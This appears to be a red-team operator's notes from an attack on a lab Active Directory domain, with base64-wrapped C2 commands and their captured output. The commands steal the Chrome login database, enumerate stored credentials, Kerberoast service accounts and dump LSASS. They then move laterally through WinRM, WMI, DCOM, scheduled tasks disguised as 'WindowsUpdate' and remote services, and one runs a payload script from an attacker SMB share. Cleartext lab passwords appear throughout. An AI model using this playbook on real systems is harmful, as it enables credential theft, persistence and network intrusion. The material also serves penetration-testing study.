$chromePath = "$env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Login Data"
CMDsharpsh -t 20 -- '-e -c JGNocm9tZVBhdGggPSAiJGVudjpVU0VSUFJPRklMRVxBcHBEYXRhXExvY2FsXEdvb2dsZVxDaHJvbWVcVXNlciBEYXRhXERlZmF1bHRcTG9naW4gRGF0YSIK'Copy the database (can’t read it directly as Chrome locks it)
cat <<'CMD' | base64 -w 0
Copy-Item $chromePath C:\temp\ChromePasswords.db
CMDsharpsh -t 20 -- '-e -c Q29weS1JdGVtICRjaHJvbWVQYXRoIEM6XHRlbXBcQ2hyb21lUGFzc3dvcmRzLmRiCg=='Cached Domain Credentials
See [[#Also save SECURITY for cached domain credentials]]
Crack with [[Hashcat#Domain Cached Creds]]
CREDS MANAGER & DPAPI
List stored credentials
cat <<'CMD' | base64 -w 0
cmdkey /list
CMDsharpsh -t 20 -- '-e -c Y21ka2V5IC9saXN0Cg=='
Currently stored credentials:
Target: WindowsLive:target=virtualapp/didlogical
Type: Generic
User: 02nqteagqddqtlqt
Local machine persistence
Credential Manager files location
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Users\*\AppData\Local\Microsoft\Credentials\ -ErrorAction SilentlyContinue
CMDsharpsh -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxVc2Vyc1wqXEFwcERhdGFcTG9jYWxcTWljcm9zb2Z0XENyZWRlbnRpYWxzXCAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQo='Directory: C:\Users\jeor.mormont\AppData\Local\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 1/11/2026 7:37 AM Credentials
Directory: C:\Users\jeor.mormont\AppData\Local\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 12/6/2025 1:59 PM Credentials
cat <<'CMD' | base64 -w 0
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Credentials\ -ErrorAction SilentlyContinue
CMDsharpsh -t 20 -- '-e -c R2V0LUNoaWxkSXRlbSBDOlxVc2Vyc1wqXEFwcERhdGFcUm9hbWluZ1xNaWNyb3NvZnRcQ3JlZGVudGlhbHNcIC1FcnJvckFjdGlvbiBTaWxlbnRseUNvbnRpbnVlCg=='Directory: C:\Users\jeor.mormont\AppData\Roaming\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 1/11/2026 7:37 AM Credentials
Directory: C:\Users\jeor.mormont\AppData\Roaming\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 12/6/2025 1:59 PM Credentials
Kerberoasting: Extracting Service Account Credentials
cat <<'CMD' | base64 -w 0
([ADSISearcher]"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))").FindAll() |
ForEach-Object {
[pscustomobject]@{
Username = $_.Properties.samaccountname[0]
SPN = $_.Properties.serviceprincipalname[0]
PasswordLastSet = [datetime]::FromFileTime([int64]$_.Properties.pwdlastset[0])
}
} | Format-Table -AutoSize
CMDsharpsh -i -t 20 -- '-e -c KFtBRFNJU2VhcmNoZXJdIigmKHNlcnZpY2VQcmluY2lwYWxOYW1lPSopKFVzZXJBY2NvdW50Q29udHJvbDoxLjIuODQwLjExMzU1Ni4xLjQuODAzOj01MTIpKSIpLkZpbmRBbGwoKSB8CiAgRm9yRWFjaC1PYmplY3QgewogICAgW3BzY3VzdG9tb2JqZWN0XUB7CiAgICAgIFVzZXJuYW1lICAgICAgICA9ICRfLlByb3BlcnRpZXMuc2FtYWNjb3VudG5hbWVbMF0KICAgICAgU1BOICAgICAgICAgICAgID0gJF8uUHJvcGVydGllcy5zZXJ2aWNlcHJpbmNpcGFsbmFtZVswXQogICAgICBQYXNzd29yZExhc3RTZXQgPSBbZGF0ZXRpbWVdOjpGcm9tRmlsZVRpbWUoW2ludDY0XSRfLlByb3BlcnRpZXMucHdkbGFzdHNldFswXSkKICAgIH0KICB9IHwgRm9ybWF0LVRhYmxlIC1BdXRvU2l6ZQo='Username SPN
-------- ---
krbtgt kadmin/changepw
sansa.stark HTTP/eyrie.north.sevenkingdoms.local
jon.snow CIFS/thewall.north.sevenkingdoms.local
sql_svc MSSQLSvc/castelblack.north.sevenkingdoms.local
Request TGS tickets for all discovered SPNs
cat <<'CMD' | base64 -w 0
Add-Type -AssemblyName System.IdentityModel; $results = ([adsisearcher]"(&(objectCategory=person)(servicePrincipalName=*))").FindAll(); $results | ForEach-Object { $spn = $_.Properties['serviceprincipalname'][0]; $username = $_.Properties['samaccountname'][0]; Write-Output "[*] Requesting ticket for $spn ($username)"; try { $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn; Write-Output "[+] Ticket requested successfully" } catch { Write-Output "[-] Failed to request ticket: $($_.Exception.Message)" } }
CMDsharpsh -i -t 20 -- '-e -c QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSWRlbnRpdHlNb2RlbDsgJHJlc3VsdHMgPSAoW2Fkc2lzZWFyY2hlcl0iKCYob2JqZWN0Q2F0ZWdvcnk9cGVyc29uKShzZXJ2aWNlUHJpbmNpcGFsTmFtZT0qKSkiKS5GaW5kQWxsKCk7ICRyZXN1bHRzIHwgRm9yRWFjaC1PYmplY3QgeyAkc3BuID0gJF8uUHJvcGVydGllc1snc2VydmljZXByaW5jaXBhbG5hbWUnXVswXTsgJHVzZXJuYW1lID0gJF8uUHJvcGVydGllc1snc2FtYWNjb3VudG5hbWUnXVswXTsgV3JpdGUtT3V0cHV0ICJbKl0gUmVxdWVzdGluZyB0aWNrZXQgZm9yICRzcG4gKCR1c2VybmFtZSkiOyB0cnkgeyAkdGlja2V0ID0gTmV3LU9iamVjdCBTeXN0ZW0uSWRlbnRpdHlNb2RlbC5Ub2tlbnMuS2VyYmVyb3NSZXF1ZXN0b3JTZWN1cml0eVRva2VuIC1Bcmd1bWVudExpc3QgJHNwbjsgV3JpdGUtT3V0cHV0ICJbK10gVGlja2V0IHJlcXVlc3RlZCBzdWNjZXNzZnVsbHkiIH0gY2F0Y2ggeyBXcml0ZS1PdXRwdXQgIlstXSBGYWlsZWQgdG8gcmVxdWVzdCB0aWNrZXQ6ICQoJF8uRXhjZXB0aW9uLk1lc3NhZ2UpIiB9IH0K'
Cached Tickets: (5)
#0> Client: jeor.mormont @ NORTH.SEVENKINGDOMS.LOCAL
Server: krbtgt/NORTH.SEVENKINGDOMS.LOCAL @ NORTH.SEVENKINGDOMS.LOCAL
KerbTicket Encryption Type: (18) AES256_CTS_HMAC_SHA1_96
Ticket Flags: 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 1/14/2026 5:38:42
End Time: 1/14/2026 15:38:42
Renew Time: 1/21/2026 5:38:42
Session Key Type: (18) AES256_CTS_HMAC_SHA1_96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: winterfell.north.sevenkingdoms.local
#1> Client: jeor.mormont @ NORTH.SEVENKINGDOMS.LOCAL
Server: MSSQLSvc/castelblack.north.sevenkingdoms.local @ NORTH.SEVENKINGDOMS.LOCAL
KerbTicket Encryption Type: (23) RC4_HMAC_NT
Ticket Flags: 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 1/14/2026 5:38:42
End Time: 1/14/2026 15:38:42
Renew Time: 1/21/2026 5:38:42
Session Key Type: (23) RC4_HMAC_NT
Cache Flags: 0
Kdc Called: winterfell.north.sevenkingdoms.local
...
c2tc-klistIf you haven’t already dumped LSASS, do it now
cat <<'CMD' | base64 -w 0
$lsass = Get-Process lsass;$lsassPid = $lsass.Id;rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsassPid C:\temp\lsass.dmp full
CMDsharpsh -t 20 -- '-e -c JGxzYXNzID0gR2V0LVByb2Nlc3MgbHNhc3M7JGxzYXNzUGlkID0gJGxzYXNzLklkO3J1bmRsbDMyLmV4ZSBDOlxXaW5kb3dzXFN5c3RlbTMyXGNvbXN2Y3MuZGxsLCBNaW5pRHVtcCAkbHNhc3NQaWQgQzpcdGVtcFxsc2Fzcy5kbXAgZnVsbAo='If privileged, should see lsass.dmp in C:\temp
Move to kali
download lsass.dmpand run:
pypykatz lsa minidump lsass.dmp -k kerberos_ticketsSet an SPN on an account you have write access to
This requires the ActiveDirectory module or direct LDAP manipulation
cat <<'CMD' | base64 -w 0
Set-ADUser -Identity targetuser -ServicePrincipalNames @{Add="HTTP/fake.domain.local"}
CMDsharpsh -t 20 -- '-e -c 'Request ticket for the SPN you just added
cat <<'CMD' | base64 -w 0
$ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/fake.domain.local"
CMDsharpsh -t 20 -- '-e -c 'After extracting and cracking, clean up
cat <<'CMD' | base64 -w 0
Set-ADUser -Identity targetuser -ServicePrincipalNames @{Remove="HTTP/fake.domain.local"}
CMDsharpsh -t 20 -- '-e -c 'LATERAL MOVEMENT
Test if WinRM is accessible on the target
cat <<'CMD' | base64 -w 0
Test-WSMan -ComputerName CASTELBLACK
CMDsharpsh -t 20 -- '-e -c VGVzdC1XU01hbiAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLCg=='wsmid : .../wsman/identity/1/wsmanidentity.xsd
ProtocolVersion : ...dmtf.org/wbem/wsman/1/wsman.xsd
ProductVendor : Microsoft Corporation
ProductVersion : OS: 0.0.0 SP: 0.0 Stack: 3.0
Start an interactive PowerShell session on remote system
Enter-PSSession -ComputerName TARGET-PC -Credential (Get-Credential)Execute a single command remotely
cat <<'CMD' | base64 -w 0
Invoke-Command -ComputerName CASTELBLACK -ScriptBlock { whoami }
CMDsharpsh -t 20 -- '-e -c SW52b2tlLUNvbW1hbmQgLUNvbXB1dGVyTmFtZSBDQVNURUxCTEFDSyAtU2NyaXB0QmxvY2sgeyB3aG9hbWkgfQo='north\jeor.mormont
Create a credential object
cat <<'CMD' | base64 -w 0
Invoke-Command -ComputerName CASTELBLACK -Credential (New-Object System.Management.Automation.PSCredential('north\jeor.mormont',(ConvertTo-SecureString '_L0ngCl@w_' -AsPlainText -Force))) -ScriptBlock { whoami }
CMDsharpsh -i -t 20 -- '-e -c SW52b2tlLUNvbW1hbmQgLUNvbXB1dGVyTmFtZSBDQVNURUxCTEFDSyAtQ3JlZGVudGlhbCAoTmV3LU9iamVjdCBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTQ3JlZGVudGlhbCgnbm9ydGhcamVvci5tb3Jtb250JywoQ29udmVydFRvLVNlY3VyZVN0cmluZyAnX0wwbmdDbEB3XycgLUFzUGxhaW5UZXh0IC1Gb3JjZSkpKSAtU2NyaXB0QmxvY2sgeyB3aG9hbWkgfQo='north\jeor.mormont
One of the most powerful aspects of PowerShell Remoting is that you can target multiple systems simultaneously:
Execute command on multiple systems
cat <<'CMD' | base64 -w 0
$targets=@("KINGSLANDING", "WINTERFELL", "CASTELBLACK"); Invoke-Command -ComputerName $targets -Credential (New-Object System.Management.Automation.PSCredential('north\jeor.mormont',(ConvertTo-SecureString '_L0ngCl@w_' -AsPlainText -Force))) -ScriptBlock { pwd }
CMDsharpsh -i -t 20 -- '-e -c 'Dont think this works with sliver
Execute a local script file on remote systems
cat <<'CMD' | base64 -w 0
Invoke-Command -ComputerName TARGET-PC -FilePath C:\scripts\enumeration.ps1
CMDsharpsh -i -t 20 -- '-e -c 'Execute a script file on remote systems via smb
cat <<'CMD' | base64 -w 0
powershell -ep bypass Invoke-Command -ComputerName WINTERFELL -FilePath \\192.168.56.134\share\hav0c-ps-x64.ps1
CMDsharpsh -t 20 -- '-e -c cG93ZXJzaGVsbCAtZXAgYnlwYXNzIEludm9rZS1Db21tYW5kIC1Db21wdXRlck5hbWUgV0lOVEVSRkVMTCAtRmlsZVBhdGggXFwxOTIuMTY4LjU2LjEzNFxzaGFyZVxoYXYwYy1wcy14NjQucHMxCg=='Create a credential object with cleartext password
cat <<'CMD' | iconv -t UTF-16LE | base64 -w 0
$password = ConvertTo-SecureString 'FightP3aceAndHonor!' -AsPlainText -Force;$cred = New-Object System.Management.Automation.PSCredential ("NORTH\eddard.stark", $password);Invoke-Command -ComputerName CASTELBLACK -Credential $cred -ScriptBlock { whoami;hostname }
CMDsharpsh -i -t 20 -- '-e -c JABwAGEAcwBzAHcAbwByAGQAIAA9ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwAgACcARgBpAGcAaAB0AFAAMwBhAGMAZQBBAG4AZABIAG8AbgBvAHIAIQAnACAALQBBAHMAUABsAGEAaQBuAFQAZQB4AHQAIAAtAEYAbwByAGMAZQA7ACQAYwByAGUAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAFAAUwBDAHIAZQBkAGUAbgB0AGkAYQBsACAAKAAiAE4ATwBSAFQASABcAGUAZABkAGEAcgBkAC4AcwB0AGEAcgBrACIALAAgACQAcABhAHMAcwB3AG8AcgBkACkAOwBJAG4AdgBvAGsAZQAtAEMAbwBtAG0AYQBuAGQAIAAtAEMAbwBtAHAAdQB0AGUAcgBOAGEAbQBlACAAQwBBAFMAVABFAEwAQgBMAEEAQwBLACAALQBDAHIAZQBkAGUAbgB0AGkAYQBsACAAJABjAHIAZQBkACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAB7ACAAdwBoAG8AYQBtAGkAOwBoAG8AcwB0AG4AYQBtAGUAIAB9AAoA'north\eddard.stark castelblack
List remote running process to file
cat <<'CMD' | base64 -w 0
$options = New-Object System.Management.ConnectionOptions;$options.Username = "NORTH\eddard.stark";$options.Password = 'FightP3aceAndHonor!';$scope = New-Object System.Management.ManagementScope("\\CASTELBLACK\root\cimv2", $options);$scope.Connect();$processClass = New-Object System.Management.ManagementClass($scope, (New-Object System.Management.ManagementPath("Win32_Process")), $null);$processClass.InvokeMethod("Create", @("powershell.exe -Command `"Get-Process | Out-File C:\temp\processes.txt`""));$result = $processClass.InvokeMethod("Create", @("notepad.exe"))
CMDsharpsh -i -t 20 -- '-e -c JG9wdGlvbnMgPSBOZXctT2JqZWN0IFN5c3RlbS5NYW5hZ2VtZW50LkNvbm5lY3Rpb25PcHRpb25zOyRvcHRpb25zLlVzZXJuYW1lID0gIk5PUlRIXGVkZGFyZC5zdGFyayI7JG9wdGlvbnMuUGFzc3dvcmQgPSAnRmlnaHRQM2FjZUFuZEhvbm9yISc7JHNjb3BlID0gTmV3LU9iamVjdCBTeXN0ZW0uTWFuYWdlbWVudC5NYW5hZ2VtZW50U2NvcGUoIlxcQ0FTVEVMQkxBQ0tccm9vdFxjaW12MiIsICRvcHRpb25zKTskc2NvcGUuQ29ubmVjdCgpOyRwcm9jZXNzQ2xhc3MgPSBOZXctT2JqZWN0IFN5c3RlbS5NYW5hZ2VtZW50Lk1hbmFnZW1lbnRDbGFzcygkc2NvcGUsIChOZXctT2JqZWN0IFN5c3RlbS5NYW5hZ2VtZW50Lk1hbmFnZW1lbnRQYXRoKCJXaW4zMl9Qcm9jZXNzIikpLCAkbnVsbCk7JHByb2Nlc3NDbGFzcy5JbnZva2VNZXRob2QoIkNyZWF0ZSIsIEAoInBvd2Vyc2hlbGwuZXhlIC1Db21tYW5kIGAiR2V0LVByb2Nlc3MgfCBPdXQtRmlsZSBDOlx0ZW1wXHByb2Nlc3Nlcy50eHRgIiIpKTskcmVzdWx0ID0gJHByb2Nlc3NDbGFzcy5JbnZva2VNZXRob2QoIkNyZWF0ZSIsIEAoIm5vdGVwYWQuZXhlIikpCg=='download //CASTELBLACK/C$/temp/processes.txt# This still needs cleartext, but shows how authentication works
$username = "DOMAIN\user"
$password = "P@ssw0rd123"
# Create WMI connection with explicit credentials
$options = New-Object System.Management.ConnectionOptions
$options.Username = $username
$options.Password = $password
$options.Impersonation = [System.Management.ImpersonationLevel]::Impersonate
$options.Authentication = [System.Management.AuthenticationLevel]::PacketPrivacy
$scope = New-Object System.Management.ManagementScope("\\TARGET-PC\root\cimv2", $options)
$scope.Connect()
# Execute WMI query
$query = New-Object System.Management.ObjectQuery("SELECT * FROM Win32_Process")
$searcher = New-Object System.Management.ManagementObjectSearcher($scope, $query)
$processes = $searcher.Get()Execute a command on a remote system using WMI
cat <<'CMD' | base64 -w 0
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\output.txt" -ComputerName CASTELBLACK
CMDsharpsh -t 20 -- '-e -c SW52b2tlLVdtaU1ldGhvZCAtQ2xhc3MgV2luMzJfUHJvY2VzcyAtTmFtZSBDcmVhdGUgLUFyZ3VtZW50TGlzdCAiY21kLmV4ZSAvYyB3aG9hbWkgPiBDOlx0ZW1wXG91dHB1dC50eHQiIC1Db21wdXRlck5hbWUgQ0FTVEVMQkxBQ0sK'cat //CASTELBLACK/C$/temp/output.txtnorth\jeor.mormont
Clean up the file
rm \\CASTELBLACK\C$\temp\output.txtGet OS information from remote system
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_OperatingSystem -ComputerName CASTELBLACK
CMDsharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfT3BlcmF0aW5nU3lzdGVtIC1Db21wdXRlck5hbWUgQ0FTVEVMQkxBQ0sK'SystemDirectory : C:\Windows\system32 Organization : Vagrant BuildNumber : 17763 RegisteredUser : SerialNumber : 00431-20000-00000-AA140 Version : 10.0.17763
Get running processes
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_Process -ComputerName CASTELBLACK
CMDsharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfUHJvY2VzcyAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLCg=='
__GENUS : 2
__CLASS : Win32_Process
__SUPERCLASS : CIM_Process
__DYNASTY : CIM_ManagedSystemElement
__RELPATH : Win32_Process.Handle="6952"
__PROPERTY_COUNT : 45
__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}
__SERVER : CASTELBLACK
__NAMESPACE : root\cimv2
__PATH : \\CASTELBLACK\root\cimv2:Win32_Process.Handle="6952"
Caption : notepad.exe
...
Get installed hotfixes
cat <<'CMD' | base64 -w 0
Get-WmiObject -Class Win32_QuickFixEngineering -ComputerName CASTELBLACK
CMDsharpsh -t 20 -- '-e -c R2V0LVdtaU9iamVjdCAtQ2xhc3MgV2luMzJfUXVpY2tGaXhFbmdpbmVlcmluZyAtQ29tcHV0ZXJOYW1lIENBU1RFTEJMQUNLCg=='Source Description HotFixID
------ ----------- --------
CASTELBLACK Update KB4514366
CASTELBLACK Security Update KB4512577
CASTELBLACK Security Update KB4535680
WMIC from cmd
cat <<'CMD' | base64 -w 0
wmic /node:CASTELBLACK process call create "cmd.exe /c whoami > C:\Temp\whoami.txt 2>&1"
CMDsharpsh -t 20 -- '-e -c d21pYyAvbm9kZTpDQVNURUxCTEFDSyBwcm9jZXNzIGNhbGwgY3JlYXRlICJjbWQuZXhlIC9jIHdob2FtaSA+IEM6XFRlbXBcd2hvYW1pLnR4dCAyPiYxIgo='cat C:/temp/whoami.txtnorth\jeor.mormont
DCOM
Method 1: MMC20.Application
cat <<'CMD' | base64 -w 0
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","CASTELBLACK"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c calc.exe","7")
CMDsharpsh -i -t 20 -- '-e -c JGRjb20gPSBbU3lzdGVtLkFjdGl2YXRvcl06OkNyZWF0ZUluc3RhbmNlKFt0eXBlXTo6R2V0VHlwZUZyb21Qcm9nSUQoIk1NQzIwLkFwcGxpY2F0aW9uLjEiLCJDQVNURUxCTEFDSyIpKQokZGNvbS5Eb2N1bWVudC5BY3RpdmVWaWV3LkV4ZWN1dGVTaGVsbENvbW1hbmQoImNtZC5leGUiLCRudWxsLCIvYyBjYWxjLmV4ZSIsIjciKQo='Calculator should pop. The “7” mean “hidden window”!
Method 2: ShellWindows
cat <<'CMD' | base64 -w 0
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","CASTELBLACK"))
$item = $dcom.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)
CMDsharpsh -i -t 20 -- '-e -c JGRjb20gPSBbU3lzdGVtLkFjdGl2YXRvcl06OkNyZWF0ZUluc3RhbmNlKFt0eXBlXTo6R2V0VHlwZUZyb21DTFNJRCgiOUJBMDU5NzItRjZBOC0xMUNGLUE0NDItMDBBMEM5MEE4RjM5IiwiQ0FTVEVMQkxBQ0siKSkKJGl0ZW0gPSAkZGNvbS5JdGVtKCkKJGl0ZW0uRG9jdW1lbnQuQXBwbGljYXRpb24uU2hlbGxFeGVjdXRlKCJjbWQuZXhlIiwiL2MgY2FsYy5leGUiLCJDOlxXaW5kb3dzXFN5c3RlbTMyIiwkbnVsbCwwKQo='Calculator should pop. The “7” mean “hidden window”!
Method 3: ShellBrowserWindow
cat <<'CMD' | base64 -w 0
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","CASTELBLACK"))
$item = $dcom.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)
CMDsharpsh -i -t 20 -- '-e -c JGRjb20gPSBbU3lzdGVtLkFjdGl2YXRvcl06OkNyZWF0ZUluc3RhbmNlKFt0eXBlXTo6R2V0VHlwZUZyb21DTFNJRCgiQzA4QUZEOTAtRjJBMS0xMUQxLTg0NTUtMDBBMEM5MUYzODgwIiwiQ0FTVEVMQkxBQ0siKSkKJGl0ZW0gPSAkZGNvbS5Eb2N1bWVudC5BcHBsaWNhdGlvbi5TaGVsbEV4ZWN1dGUoImNtZC5leGUiLCIvYyBjYWxjLmV4ZSIsIkM6XFdpbmRvd3NcU3lzdGVtMzIiLCRudWxsLDApCg=='Calculator should pop. The “7” mean “hidden window”!
Scheduled Tasks for Remote Execution
cat <<'CMD' | base64 -w 0
schtasks /create /tn "WindowsUpdate" /tr "cmd.exe /c whoami > C:\temp\output.txt" /sc once /st 00:00 /S CASTELBLACK /U NORTH/jeor.mormont /P '_L0ngCl@w_'
CMDsharpsh -i -t 20 -- '-e -c 'ERROR: This request is not supported. ???
After creating the task, run it immediately:
schtasks /run /tn "WindowsUpdate" /S TARGET-PC /U DOMAIN\username /P passwordThen clean up:
schtasks /delete /tn "WindowsUpdate" /S TARGET-PC /U DOMAIN\username /P password /FFor better OPSEC, you can configure the task to run as SYSTEM:
schtasks /create /tn "WindowsUpdate" /tr "cmd.exe /c your_command" /sc once /st 00:00 /ru SYSTEM /S TARGET-PC /U DOMAIN\username /P passwordCreate a scheduled task using PowerShell
Register-ScheduledTask -TaskName "SystemMaintenance" -Action (New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -Command Get-Process") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1)) -Principal (New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest) -CimSession CASTELBLACKcreates a task that will run one minute from now as SYSTEM.
cat <<'CMD' | base64 -w 0
Register-ScheduledTask -TaskName "SystemMaintenance" -Action (New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-NoProfile -Command Get-Process") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1)) -Principal (New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest) -CimSession CASTELBLACK
CMDsharpsh -i -t 20 -- '-e -c UmVnaXN0ZXItU2NoZWR1bGVkVGFzayAtVGFza05hbWUgIlN5c3RlbU1haW50ZW5hbmNlIiAtQWN0aW9uIChOZXctU2NoZWR1bGVkVGFza0FjdGlvbiAtRXhlY3V0ZSAicG93ZXJzaGVsbC5leGUiIC1Bcmd1bWVudCAiLU5vUHJvZmlsZSAtQ29tbWFuZCBHZXQtUHJvY2VzcyIpIC1UcmlnZ2VyIChOZXctU2NoZWR1bGVkVGFza1RyaWdnZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuQWRkTWludXRlcygxKSkgLVByaW5jaXBhbCAoTmV3LVNjaGVkdWxlZFRhc2tQcmluY2lwYWwgLVVzZXJJZCAiU1lTVEVNIiAtTG9nb25UeXBlIFNlcnZpY2VBY2NvdW50IC1SdW5MZXZlbCBIaWdoZXN0KSAtQ2ltU2Vzc2lvbiBDQVNURUxCTEFDSwo='TaskPath TaskName State PSComputerName
-------- -------- ----- --------------
\ SystemMaintenance Ready CASTELBLACK
Create a service on the remote system
cat <<'CMD' | base64 -w 0
sc.exe \\CASTELBLACK create UpdateService binPath= "cmd.exe /c whoami > C:\temp\output.txt" start= demand
CMDsharpsh -t 20 -- '-e -c 'Start the service:
cat <<'CMD' | base64 -w 0
sc.exe \\CASTELBLACK start UpdateService
CMDsharpsh -t 20 -- '-e -c 'Clean up:
cat <<'CMD' | base64 -w 0
sc.exe \\CASTELBLACK delete UpdateService
CMDsharpsh -t 20 -- '-e -c 'cat <<'CMD' | base64 -w 0
sc.exe \\CASTELBLACK create UpdateService binPath= 'C:\Windows\System32\cmd.exe /c start /b powershell.exe -Command "Get-Process | Out-File C:\temp\processes.txt"' start= demand
CMDsharpsh -t 20 -- '-e -c 'Start-Service -Name UpdateService -ComputerName CASTELBLACK